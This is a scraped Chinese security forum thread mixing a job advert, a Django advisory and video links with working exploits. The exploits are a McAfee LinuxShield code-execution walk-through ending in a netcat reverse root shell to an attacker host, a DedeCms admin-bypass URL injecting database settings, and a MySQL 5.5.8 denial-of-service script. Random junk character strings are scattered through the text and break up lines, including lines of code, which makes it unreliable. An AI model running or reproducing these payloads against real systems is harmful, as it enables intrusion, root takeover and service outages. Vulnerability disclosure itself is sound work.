[人才招聘] [招聘] 启明星辰研发招聘 启明星辰

小妍

站内发信给我就行了。! }4 j7 y- p, Z& N6 _4 t

, Q7 Y- k  s/ Q. q" g  V

一、研发中心：Linux C软件工程师（若干）

岗位职责：

1.
6 Z  N0 C/ ?% q+ J- F' S安全网关,防火墙,IPS等嵌入式设备软件开发，维护

岗位要求：

1.
) n5 g, a# y8 q2 S4 Z: h精通C语言编程

2.
  ?$ }# m8 I4 n0 `. r熟练使用Linux操作系统，精通 Linux下C语言编程

3.% Z5 W4 B' T7 @4 ~! m4 ?: q  Y. ?
精通TCP /IP 等网络协议，熟悉应用层协议，及协议分析

4.
- G- T+ \3 k! c: ^! E+ s7 t9 n* ~熟悉网络安全协议及路由器、交换机、防火墙等安全设备

5." s. n4 q8 p8 `+ b! y; m: I$ x
熟悉Linux内核及开发

二、研发中心：测试工程师（若干）

岗位职责：

1.
5 E9 }6 V3 n, Q! i6 R! i负责产品的系统测试、集成测试工作

2.! @$ Z% D- |  v0 x6 h/ ?! i) u
负责产品用例的编写，执行、修改

3.
- Z9 o& ~7 [' H5 @  x负责产品性能的测试

4.
& [/ F$ ~! @6 B5 {& U- M4 W负责对外项目的支持和测试工作

岗位要求：

1.
& V" a, L0 d* u, f9 j. [掌握基本的tcp/ip知识

2.
  I2 o- x1 i% p1 b数通基础好

3.
2 ~9 L2 l! L7 ^% x对linux有一定的基础

4.
% q$ [3 L9 O& b掌握数据库的搭建和使用

5.
9 {/ Y! ~/ N8 ]" F  A/ q0 p至少熟悉一种编程语言C/Perl/VBS/TCL

6.
* j- z% C' o6 }4 c6 h3 d8 m熟悉测试用例设计,熟悉系统测试，熟悉压力测试

7.8 P' C1 Q! x. K! B+ ~9 {+ Y
熟悉防火墙相关原理，对于防火墙的一些功能特性有一定的了解

8.2 ^9 o+ p3 T3 }1 \
对网络安全设备在网络中的部署有一定的认识

9.' s9 D( r7 b9 |! S  @
掌握测试工具的使用：Loadrunner、包分析软件、思博伦或IXIA的测试仪

三、研发中心：安全事件工程师（若干）

岗位职责：              

1.; M, X8 g* P& ~5 b* |* h
木&马检测服务、WEB漏洞扫描服务的实施

2.3 P6 @0 Y( F' }
对服务客户的技术支持

3.- E$ a) Q& H/ n6 T
对于网页木&马，WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

4.7 t& Q$ ]( O# Q/ t- U
对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

5.
: ~* k# G. c! \, n& M对各种攻击手段的研究；TCP/IP协议的研究；逆向工程的研究

奶妈

McAfee LinuxShield 本地/远程代码执行漏洞

---

McAfee LinuxShield remote/local code. u" b; v& ?+ l# t
影响版本: McAfee LinuxShield <= 1.5.1% C+ d) `( M: Z6 h3 `: J# }
远程攻击: Yes 2 E; z, Y; z3 S2 V/ ?9 d! @
本地溢出: Yes
" c) G: {, O( \" F+ ~背景阅读:7 D6 K5 O7 N( x4 G
===========* @- U8 @8 [% _. _9 ]' |
) \* S& z9 k6 }: O4 k# a, z# C
LinuxShield detects and removes viruses and other potentially unwanted
3 l8 l5 m6 x2 x6 @software on Linux-based systems. LinuxShield uses the powerful McAfee, n% x0 O8 h) C& V  u1 T5 b1 H8 S6 C
scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our( h1 [* A  ^# l: q/ z: F
anti-virus products., j: D; O5 ?  q6 V# [1 G

! v! r- }5 k6 M, ZAlthough a few years ago, the Linux operating system was considered a/ v) w% X: Q0 ~6 l/ E) l/ b4 E
secure environment, it is now seeing more occurrences of software
. ~+ d( F  @* V) ^1 H- ~. Y7 Lspecifically written to attack or exploit security weaknesses in
- M- y  O# D' d! p; n+ J4 R2 `Linux-based systems. Increasingly, Linux-based systems interact with( K# d* A) S  u- n3 L) e6 c$ [9 W
Windows-based computers. Although viruses written to attack Windows-! b0 E2 a8 y$ J: z: C
based systems do not directly attack Linux systems, a Linux server: @' M1 ~$ L& _0 i7 F2 ]! h
can harbor these viruses, ready to infect any client that connects to' U+ i$ \- X6 H; o9 D; h
it.6 }# Y& K: [9 `
3 W1 H% k% J6 O+ W6 [$ G
When installed on your Linux systems, LinuxShield provides protection$ ?7 @4 m  M4 o
against viruses, Trojan horses, and other types of potentially$ }3 y0 O- o- `7 F1 Z
unwanted software.
+ B, Q4 \6 @! }/ ~1 z& z) G: B9 t) Z
LinuxShield scans files as they are opened and closed
) }' S& f; ~; S1 @+ i% m; C4 X?&amp;#65533;&amp;#65533; a technique
' h6 {/ F2 f7 }8 P* _" c( Lknown as on-access scanning. LinuxShield also incorporates an2 f9 ], [: J# ]6 `  l( t6 H
on-demand scanner that enables you to scan any directory or file in$ o" p; Q9 g4 v/ V
your host at any time.( M2 P( f: o# u' Q

+ F  \$ X  s8 i" V0 _+ Q7 PWhen kept up-to-date with the latest virus-definition (DAT) files,
! [/ D. Z8 y$ d: HLinuxShield is an important part of your network security. We% H8 ]/ H; ?9 z$ U
recommend that you set up an anti-virus security policy for your3 I7 }# C) m9 w7 g' N
network, incorporating as many protective measures as possible.
. l, J7 E. }5 Y6 J  m. y$ L; Y
" n  ]2 B$ H' A1 RLinuxShield uses a web-browser interface, and a large number of7 Y0 k. l3 k8 O" w$ ^, ]
LinuxShield installations can be centrally controlled by ePolicy
. D) r# M7 b, F/ ^/ X- _Orchestrator." }& A& a7 j0 D$ U0 P! i

* W$ d8 x: L; c9 Q' I(Product description from LinuxShield Product Guide)" e2 j: U. ]) ~; t4 N* B& v/ \4 b

2 D! C% B$ M7 N2 s5 x
5 j9 y% B+ f1 t: g' f- }" M4 v; p) N3 Y/ O8 R
Description:3 v+ g/ T5 }/ `% ~) s7 w
============5 E( _' u: w/ o* t# o7 u
) E  w  b' B8 _+ R
This vulnerability allows remote attackers to execute arbitrary code1 l6 i+ B% y& P' @6 T/ K
on vulnerable installations of McAfee LinuxShield. User interaction
- F' ~# ^  a  [# j3 x2 F: Fis not required to exploit this vulnerability but an attacker must" v% p( C0 i6 H! s
be authenticated.# S4 j% B# k, j- |5 {
3 F, X/ W3 V0 _5 e+ O5 M
The LinuxShield Webinterface communicates with the localy installed
! T5 I$ x" Y' ~1 B! ?$ n"nailsd" daemon, which listens on port 65443/tcp, to do
+ u" ~8 S+ [% S0 yconfiguration7 g, \* b4 @: u5 ?. O
changes, query the configuration and execute tasks.- x6 e& K! P6 t. o. r4 e5 x) F: V
! i, q" q% a6 m
Each user, which can login to the victim box, can also authenticate# g* j# y, G& @4 [. M- }
it self to the "nailsd" and can do configuration changes and7 U- x$ S- {9 F. @6 n: k* h
execute) T3 l6 T! F$ U" I5 c
tasks with root privileges.
* j/ c5 y% `& d, _+ P
, k$ E9 M9 U0 B1 Z/ W, zA direct execution of commands is not possible, but it is possible to
) e# ?: b) d2 g$ q5 wdownload and execute code through manipulation of the config and9 p4 C- }/ R1 Z7 n' y! m: M5 l0 Z1 g
execute schedule tasks of the LinuxShield.
' o( I; I3 G, A7 k: D
- ~/ s, K4 `  x7 b/ t+ b( @' E7 D
7 _& ?  S. Z+ A3 Iwalk-through (after the TLS handshake):
5 u4 l( G3 z8 ?0 P, R' W+--------------------------------------
* f  i% X) U. `& ]- L% a8 f, Y( {1 m( o3 p: |! t1 W
nailsd > +OK welcome to the NAILS Statistics Service; s4 r  s3 g- Z# Y  D' g5 X
attacker> auth <user> <pass>* A  P! H* x0 |3 H& c
nailsd > +OK successful authentication
8 b0 {. t1 I# d$ ~
9 ~; L# `, j# C+ ]+ @: V- m1 i# Set the Attacker repository to download our code from a httpd
. L( u& v3 `5 ~) E+ S6 R# (catalog.z)& o" i3 @3 y! l+ Y0 W& j3 [4 A
#---------------------------------------------------------------
8 g4 n/ b6 Z* n' h* R% ]; {attacker> db set 1 _table=repository status=1 siteList=<?xml version
9 l* K. D: G1 g6 @7 U' w# Y="1.0" encoding="UTF-8"?><ns:SiteLists6 D" }6 u( G" b+ u  Q
xmlns:ns="naSiteLi
7 q5 G6 \1 G' Xst" GlobalVersion="20030131003110"7 N6 F8 u$ Y* Q5 J
LocalVersion="20091209
2 q$ I; g% M9 F2 C1 a  Z7 ?161903" Type="Client"><SiteList- G4 [# x' S" Z) `# U  R$ f
Default="1" Name="SomeGU
/ `/ [* e9 o2 [4 hID"><HttpSite Type="repository"7 B& o% V+ k& n8 [
Name="EvilRepo" Order="1: @5 ~$ R4 r$ R0 f* O( w
" Server="<attackerhost>:80"
& ^) K3 U' s3 x; JEnabled="1" Local="1"><Rela( V+ U$ P* X/ P
4 T5 t( _  J8 k' t% ]! ~8 A
tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
0 }+ \1 h7 L3 W1 W$ W& UrName></) U, H2 M2 {5 s7 Q7 ]
UserName><Password9 p! U. `& I- o7 F. G) D- r
Encrypted="0"/></HttpSite></SiteList></% B% R8 X+ V2 ~+ \. f) F
ns:SiteLists> _cmd=update8 M* B8 U; P8 g4 W
nailsd > +OK database changes buffered.9 t: D/ \. }: W3 b2 V: N

1 l! `/ V3 C* H* b& I7 B# Execute task to set the attacker repository
/ k3 k9 B5 Z" ^#---------------------------------------------------------------
. n& X/ Q# e) _1 q( a. N% D. }attacker> task setsitelist( @* r0 n5 R3 B- g6 X
nailsd > +OK setting sitelist from CMA.5 H$ n1 e3 N+ Y0 I

8 ~1 H2 R$ l* ^6 j# Execute the default Update task to download the code' W; u( W  M( D% p+ y0 ~; z' R
#---------------------------------------------------------------* ^" C/ g# ?4 [# E( w7 l" ?& N0 }" y
attacker> task nstart LinuxShield Update
' N$ `1 R, n! Knailsd > +OK task LinuxShield Update starting0 a# P- o9 T# a. H& E# O7 ?2 q8 Y
* \) Q9 ^* t& F% ]$ t
# Create a Scan profile, which executes our code. The profiles are
" r! D+ c9 h& A2 k# not stored in the database.. k3 ?" V7 z- p5 e
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
% x4 ~2 P+ O& }+ K#---------------------------------------------------------------% o9 L/ f& t" {3 D2 H5 w7 f! }
attacker> sconf ODS_99 begin
1 H+ {7 D; I9 |5 M" c* B  U& Wnailsd > +OK 1260400888  u6 l0 c6 C: Q' i; B( b& ^5 w+ A

3 l4 l; c* D5 b' `# Set the variable "nailsd.profile.ODS_99.scannerPath" to the1 A1 y. i0 F$ R' u7 }
path
9 Y( B  H& Y6 s' d' W9 Q# where our earlier downloaded catalog.z file is stored.9 c' u6 R0 w* p2 F9 W
# (/opt/McAfee/cma/scratch/update/catalog.z)
" s/ g( s0 e/ k3 h( k+ J* p#---------------------------------------------------------------
( F, B( V) a/ D- D; jattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
. V+ R& a# t$ w0 t; Jtrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O" r" C6 l# _/ ]( Y& p- U, |
DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=# w2 M" D# @& V# I
10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
0 \: L. @3 W* V0 Q+ F+ l9 Fine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro0 p$ A0 `& L( I
file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD7 a8 K  u& I; E4 _7 I5 j
ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en1 o7 [& {3 u! ?* u* q/ i
ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
; L( |4 [3 Z# O) r  ?+ A.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu' z$ z  M3 f3 n# b- a
risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru# C* H3 M: e3 e% i2 a9 p
e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
1 ~# B9 p3 U  @  M.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
; ]/ f3 n) b1 h( Z8 vle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
+ U9 B1 ?/ Q6 T5 e7 @dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin" v7 h. E- q- @. A6 d- \# ?3 G
e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
- |% ^' g5 A$ w  U& M5 i/ v6 Cofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
( T7 Q# @: S) N9 p1 I" fo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
$ b& w! W. |# W; P.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
" K) ^; g& c: v; p9 K3 X! k! f. Srue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
0 t$ [0 E/ r  x" A% D) @$ ?. l: M' Pch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
& _; ^! X  U* t4 k7 o00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
: M; `) F7 l' A) x/ xODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil% v5 h8 R( H3 e7 B
ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
" V  ~+ l; i! K, ^4 Gnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
0 c  K! {" n. w2 u2 H8 pofile.ODS_99.filter.extensions.type=extension nailsd.profil! ?; u9 J0 b$ \: t- Z7 C
e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
8 C4 R/ n9 I8 O7 E; }8 t.action.Default.secondary=Quarantine nailsd.profile.ODS_99.
" j6 Z; g! v  V  e  D2 Saction.App.primary=Clean nailsd.profile.ODS_99.action.App.s2 ^) B! s+ h# B5 ^; X
econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa0 `9 m- o* \# Y+ L
ss nailsd.profile.ODS_99.action.error=Block
* F& O; H1 I  o4 c, Cnailsd > +OK configuration changes buffered% U6 x  w# A7 b
attacker> sconf ODS_99 commit 12604008881 b2 |. R/ t* {) |7 s. R  M
nailsd > +OK configuration changes stored
" p, A0 `2 ]4 u" ~9 s
1 ~& D7 K) I$ o& x% k7 D3 ]/ k# Set a scan task with the manipulated profile to execute the code
& y- n- T" W# ]8 b#---------------------------------------------------------------
& d9 [4 U) V' Q5 e# |; Lattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy; I4 v3 p) p$ _" ~" Q% v" Z
pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t* {% d' \4 z# y. w( }8 }& I3 R' P% D
mp;exclude:false timetable=type=unscheduled taskResults=0 i
6 I) I0 u% T& T; \) E" J_lastRun=1260318482 status=Stopped _cmd=insert  N; T  o+ P& h% v, w$ j
nailsd > +OK database changes buffered
  H0 P; v1 G" \0 F8 E4 @, Y. f7 d8 E% p& I: u. b* k" Q' X2 U- f+ L
# Execute scan task to execute the code
; K6 f- J- X' K, \; @: T#---------------------------------------------------------------0 v2 H- l0 _8 }: s, w
attacker> task nstart Evil Task* z0 _  W4 F/ `8 `8 t
) g# A# {: z1 l
+-------------------------------------- walk-through EOF
+ M6 T5 l5 u# T1 z0 V# c5 w2 |, @
% p, i9 W" Q' r
4 [/ g, a" a  lTo get a reverse root shell place something like this in the catalog.z; |' A7 A$ g5 c) e  Z
( i4 K' v' \- j/ _1 P7 A
--- snip ---4 K2 t; {4 q1 V, A+ l* Z+ M3 s
#!/bin/sh$ V$ l  E6 h( E. p+ D
nc -nv <attacker_host> 4444 -e /bin/sh; @$ g9 \" G, V- I1 B2 |
--- /snip ---
) ?( Q. |. C# u# L6 E4 W1 [+ J- s+ [0 L7 s. @5 v

. E9 B( B9 @9 w1 x; N* V
8 V1 a1 n0 z. j  PProof of Concept :
6 w3 \0 U. C: Y. X! \$ U0 I; _8 T6 N==================5 o" R( l0 `6 M8 Z, G1 D

( Q7 A# W+ ?8 Z/ hhttp://inj3ct0r.com/sploits/11165.tar.gz
, G; q/ y/ M( y1 L- e9 k$ h/ |3 @$ }( P7 V8 k
4 A$ p" x2 L/ [2 X( O/ e
% V1 g' @/ i- p8 v7 E
Solution:7 N6 g4 t1 }9 e) U# t/ }
=========
# g4 Q& r- N* o9 i; W$ E3 A: v) y( ]. d5 R7 k8 |1 s" v7 y2 u
McAfee Advisory( {) Z( {  m  U7 ?- q7 v
+--------------
6 ~4 z% X7 d" Nhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007) e7 e! q5 w% E
6 {- j% W; e  O. `; q

' ^9 b5 V) a9 Q2 b& j; |2 ]8 X4 i' O; _7 Q9 r$ m
Disclosure Timeline (YYYY/MM/DD):6 A, u6 W$ q+ u1 S; n5 v* w2 t
=================================! d" H6 v7 A5 Y; y( l
% v$ Y9 o$ c/ ?& z/ y. E* F
2009.12.07: Vulnerability found
5 o6 p, x  I- P9 E' Z! l2010.02.03: Asked vendor for a PGP key/ @( `7 E% V4 H
2010.02.05: Vendor sent his PGP key$ c( o$ P, t8 o2 ]/ i. o
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure  e/ R6 a6 N6 j' U0 t
date (2010.02.18) to Vendor4 Y9 {' I7 z3 F& D$ l$ x. c- f( X% F
2010.02.05: Vendor acknowledges the reception of the advisory
0 {, B9 a' ]- I6 W  W+ H( s2010.02.16: Ask for a status update, because the planned release date is; g' @) N2 Q& [3 r5 s
2010.02.18.
4 k) m* n$ U8 v6 y2010.02.16: Vendor response that, they are currently working on a patch4 h% N$ E# {* g" H% D' G+ K
2010.02.17: Changed release date to 2010.02.25.. B3 R% M* r7 E$ W, j0 f3 z
2010.02.22: Vendor gives a status update, that they are able to release
( ^( {4 H( o; ~7 D5 [the patch on 2010.02.25.- i5 v4 N1 `/ K! l. D- o+ m" W
2010.02.24: Ask for a list of affected products and the advisory url.
  W5 w! C  C! c- X. h2 H2010.02.24: Vendor sends the list.* H2 P' J& M$ B% C
2010.03.02: Release of this Advisory. s" G3 |) O- _! a- @
1 F7 H3 M! L; X9 d
  r: E) ?  j) L% E
% m& B. m0 J" u4 w- h0 Y+ d) V

) J1 ?/ |. u6 a+ T; H7 U0 E% B* X" l5 J+ ~6 }9 T  e

( C/ j2 q2 P2 R& D9 U. N: _0 Q* |$ c! {) l# O5 J3 b- t) \

4 _/ @, x- }$ b5 `
8 j- a9 v' ^1 |+ T" Q1 a5 ~5 r; I, D

" o, I; `( _" ?: I4 M# F8 @2 G; C7 o% ~: o2 m8 W
' @& e) q; P0 s2 |& x9 e' G. `  m1 u

' s& h6 w* L! J1 `0 N  T& c3 _& q/ g

$ w; ?, ]% A' f: |) p. l" J; {. c- c5 O/ O2 p

8 x0 I- L* i3 O6 I) u) ]4 t8 k! N
2 G3 w# C! @  X2 U) R, g, o9 k  h
9 ~+ {# F5 s* m3 q
# D6 E+ z3 z. L7 r5 R公告：https://www.sitedirsec.com公布最新漏洞，请关注

奶妈

Django开发框架多个安全漏洞

---

发布时间: 2011-09-12

+ I: C8 }2 b4 [: ?

影响版本:6 b8 M! A- B+ m
Django 1.2.52 U7 ^$ Q+ {: _0 `
Django 1.3 beta 1. B) A* }+ n- u* q2 J  l" e: N" P
Django 1.2.47 Q' |9 c4 w3 ~
Django 1.2.2
7 Z/ Z+ L. ^/ {3 _: m+ GDjango 1.2

5 B) T  _/ r! M* h: j0 D

漏洞描述:

6 ~4 H+ z- G1 \7 X

Django是一款开放源代码的Web应用框架，由Python写成。
4 r* I  {) _2 `0 l/ J  Q( JDjango存在多个安全漏洞，允许攻击者获得敏感信息，操作数据，进行缓存毒药攻击或进行拒绝服务攻击。
( L9 m7 t% X( D6 ]' V1)当使用缓存后端时django.contrib.sessions中处理会话存在错误，可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。, o' e: W+ U/ X6 o6 u% q( z+ T) [
2)Django模型系统包括一个字段类型-- URLField --，用于校验提供的值是否为合法URL，如果布尔关键字参数verify_exists为真，会尝试校验提供的URL并解析。默认情况下，底层套接字没有超时设置，攻击者可以利用此漏洞发送特制URL消耗所有服务器内存，造成拒绝服务攻击。( J1 g" ^3 y+ z
3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误，攻击者可以利用此漏洞把重定向应答返回给"file://" URL，可判断服务器上的本地文件是否存在。
) j# H7 h8 X4 @. U/ B; [" \0 D4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误，攻击者可以利用此漏洞进行缓存毒药攻击。

% K9 t. E: V6 `, `$ P

细节参考:
% A" N! b/ [4 v. chttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/0 \$ d# w. M; g
http://secunia.com/advisories/45939/

' u: ?2 _. I6 P( V4 y# W2 r

  _) L# }* R7 ^8 c0 W. z! F: b" o% i8 w& h9 l8 s* v+ x+ Y% {
7 P. y. \4 j% z
& w/ ^  z" ]5 C$ G- ?5 T
7 F8 v9 Y3 N1 c7 C

% {/ q0 }6 n  B3 E7 @3 X
" p& |, _! i( B8 T
1 M! G( C1 W* x8 y% p% m7 j. ~
" r- V" V5 A, [1 \
  _* q' ?+ e" W/ e- b& E
8 Q2 B, t, k: @: y5 m- C2 n8 m& e

7 ?, x- ~" T3 g3 e. e* z- j. s' r) a2 x

5 s+ u- \2 n. w  e- d* W6 M! `: y+ M0 p. Y: M+ F" }
: }4 Y/ e) v2 p0 w& d

8 J: A5 Z8 ]0 c# {8 k" m# b! ^2 l& z+ j) p  Z' S" h
公告：https://www.sitedirsec.com公布最新漏洞，请关注

若凋零子爵

手把手教你装Linux系统-设置虚拟机工具

---

<P align=center>3 t' E% L! a) p. E) W

0 ^5 }& U5 [' h) J; _0 v+ t) Chttp://www.sitedir.com.cn/video/8.swf[/quote], e4 x( i9 M" }; a8 H* {
3 W6 C9 T, D' E. g) }3 ~

3 P  C6 `5 Q1 b" r7 x: p
$ [$ I6 J( n2 F( V1 g8 K9 x; N2 N. o8 z$ e! i  F, y- S
$ S7 z4 j; v" ]: }9 }

2 C2 S9 i, {0 s5 S  C
) S0 R9 ?5 R# n- e
9 W) E9 g/ C; K8 |7 C: _# |9 o& U% R
* h' M+ U- O2 ~' B& q/ r5 ]9 m/ ]4 k
9 l0 ]) b' R5 z2 H, v! w) \1 q

) g% x9 |% K+ L$ W# C8 \# l: A! `0 Z. b5 Y" V
3 g/ l6 w% P  b/ \: O
; w$ O  Q$ ]) a' W- b3 A7 Z3 c% P
8 n9 l6 a/ e/ B; T) ~8 Z4 [

' @  Z  {/ ~% y* G! S. J( \
( n% \  \* I$ K7 O公告：https://www.sitedirsec.com公布最新漏洞，请关注

arja

织梦(DedeCms) v5.6-5.7 越权访问漏洞

---

http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

# [$ X! s; j/ V: D' B8 l3 U4 I

把上面validate=dcug改为当前的验证码，即可直接进入网站后台

4 U8 ?( d6 @) f  x9 e9 K

此漏洞的前提是必须得到后台路径才能实现

( Z  ?% ?4 ~3 @8 w4 W3 P# h% I* b5 \* N

官方临时解决办法：

0 X6 _& D) G6 O0 t) a! ]

找到include/common.inc.php文件，把：

# F5 E! U% E' V

    foreach($_REQUEST as $_k=>$_v)
) O, R  h" d6 d    {
: J8 N. H9 c, E" g        var_dump($_k);& H0 F0 a/ Y7 @( \$ M
        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
  U, r0 s& K( e0 Z0 R        {
* [9 j: V* W: H' K            exit('Request var not allow!');
2 V/ E# e1 A) g: w, n* D        }
( v! {" n* d$ X* g    }

0 [& c- }( ~& c

换成：

* A7 v/ s5 S/ K0 m$ p8 U! G, s$ a' \9 x

    //检查和注册外部提交的变量
. `# n) Y; q: r, T    function CheckRequest(&amp;$val) {% b; d. {& m) U2 T1 Z8 }
        if (is_array($val)) {
( c* d0 S) }+ R8 o0 S+ F! @3 E1 R            foreach ($val as $_k=>$_v) {
5 k7 E* {0 f" N' ]2 a/ r4 C* |: `                CheckRequest($_k);" j0 ~& |& t/ B
                CheckRequest($val[$_k]);. g# i% w! z7 v
            }
) h  ]) X, T" X3 p8 o/ v        } else
: M) G/ j3 p( W" S/ ^' E+ b        {
( m8 t8 B0 p( ~" s* J0 o5 ?. A3 I+ F            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )* B, F9 v7 e0 E, a6 t* n
            {7 T6 e% A% i" w# Z& j! t9 s
                exit('Request var not allow!');
  \$ w" q5 Y& k8 l3 M- q            }
4 w2 i7 B5 H7 s% W1 R! s" R5 T$ e        }$ I5 x, r. L$ _7 r% e* {" m
    }
6 J6 D9 i1 o# P3 ], D    CheckRequest($_REQUEST);
0 e! O3 W" ^; G' V: N

, W. c5 ~' h6 ]+ q, P+ @( X0 @. s% l7 T

1 W! A" L$ s5 d0 ]  g
1 X+ a& l0 y7 _1 e* ]8 L, b$ p# c- ~# D5 R, h5 |/ P* B

$ Q: h7 a  W1 c9 `8 [' G% r3 H/ B! b+ C, L: J

0 t  c. `) P: ?( F8 \0 k" T
; |& K) i6 c9 }4 X3 j
% @% ^$ J, {, }. f& c* @
# G5 n) {6 c8 `8 _$ L) f2 g! b/ Z# f  Z/ J, x/ C

+ l, R! H% w. J+ ]. P( c+ c) F5 Z3 K' `% G! p8 D  Z

9 [% v2 n5 R# C2 B+ N. t! t5 ?0 z6 _8 M$ ]# d

9 B) {/ b8 K8 {) s4 I' _6 h9 n5 T$ \6 K& e' q+ S2 x- l

+ |( W3 g) @; ~1 \. K* A9 B' s* K公告：https://www.sitedirsec.com公布最新漏洞，请关注

二级菜鸟

手把手教你装Linux系统-设置虚拟机

---

7 c5 E1 R* a1 z) B1 @$ b# I  v& thttp://www.sitedir.com.cn/video/4.swf
  J) C3 `7 w; H  f
! f& p, Q0 F; S5 S1 m4 G/ {9 G
+ m5 Q7 R/ c% n' w
, \& y" ]7 R" s& U
& D+ T# _; `% i# z# [% m# ~

' x! B, _0 M8 B' X5 s4 ~4 F* F1 [$ x. L5 H3 S( L: [

  ?, G6 {. v, \+ q+ z3 {6 ]6 R; g$ u" N$ t; B

  i3 I2 P/ C. h& g1 v9 t6 s
6 J! I- o) c  A8 u0 F
- K' ?1 r  B& v' a4 W6 {
; R. T3 u1 p2 A  E  o9 O) K* B- P

, D1 N0 z7 j& L4 g4 t- h7 \) f* k
3 v' x# [( o* ?  o: P$ s1 @

- I) v7 I" G+ V* [: o) `7 V公告：https://www.sitedirsec.com公布最新漏洞，请关注

dg86760517

MySQL 5.5.8 远程拒绝服务漏洞

---

import socket, sys& Z" w0 j# V1 h  j. o1 I

5 o* T) u7 N1 h- v7 M. Hprint "4 M$ {" e* U. \7 J$ e
"5 P: r2 E& N2 O1 f, ^! l4 p, V, N
print "----------------------------------------------------------------"
8 K3 ]# H% f+ o1 Yprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
% Z1 S5 D: ^8 Yprint "| Level Smash the Stack                                         |"* ]/ f4 l% g  v% I! ^5 @
print "----------------------------------------------------------------"5 e# R! B  I+ R3 u. c+ d& m
print "
! e" B. N+ |. W, k( q0 L- R"; }7 w' l. F2 Y# F) Q- M& G
! v3 }0 e- P7 `7 ]! ~7 S4 @6 v
buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
$ `/ t+ y& [& V. y"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
, i* P$ ^! a' y7 Q+ Z3 e 1 _  j9 e8 k+ v+ L/ \/ P/ `
buf2=("x11x00x00x00x03set autocommit30")! n! ~- X8 J% y* y# n4 y* F, k

8 ?+ y: p4 g! n1 m/ z( g6 Gdef usage():5 K4 B4 @$ a9 a' K. `6 _
print "usage : ./mysql.py <victim_ip>"
( x# V' C$ z0 Oprint "example: ./mysql.py 192.168.1.22"
) S8 R% G( @) x   r+ u( W- H- R% ]4 t4 Y
* b* g* B7 |/ Z* ]" G: l$ L
def main():5 A; D* ~( i, k1 d
if len(sys.argv) != 2:
2 z) n& o" ~$ v4 p9 S! Q1 wusage()' ^- G; x4 m2 M; z% e1 {1 [4 g
sys.exit()
! a! P* x# \+ x/ E$ ~s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
" Q8 V+ _& S% U  G3 N3 Z4 E9 I
/ O& @( d; r3 J5 UHOST = sys.argv[1]8 g1 g( k; ?3 |$ V0 [
PORT = int(3306)
& c- M8 C! X' T/ r' y9 r' Ls.connect((HOST,PORT))  \. j# _  }( @. q
print "

Connect"# L" e: L0 S3 }
s.send(buf)6 d7 u9 H% L9 B' s
print "

Payload 1 sent"
# u9 W9 H; n+ ]! i. ^  u% ws.send(buf2)
6 K" Q  l' |1 E& cprint "

Payload 2 sent) `$ v- ^8 R1 R
", "

Run again to ensure it is down..
1 ?. F& a, T" d0 D0 s8 W"! S2 T' D  `8 B" g" L
s.close()
$ d6 V# S: R, y% y: }. v7 b3 p  J% O
: n3 N6 n/ S. v7 `if __name__ == "__main__":& r+ _) ^% x7 E4 U2 U: G! V
main()
5 m, V. v- v* A) M6 A0 y- K# b& I2 D# W/ g. c) J# ?' E* Y
5 O6 f, Y3 m; i
* [$ ]) n, ~, I) e, y* l+ r
7 C* s. l( }. l) T+ q" H4 i2 d
- _5 x. Y- _4 ^, D

; v1 d; ^8 l6 `7 s* u- G, F# o# N( f! N5 m# x

, C$ F2 h4 j8 }' s& Y7 w  O/ [. F3 a
' m9 Z, o8 t$ j$ q, y

7 ^- d6 r( n1 U$ c$ C7 m5 `7 ^  d3 @

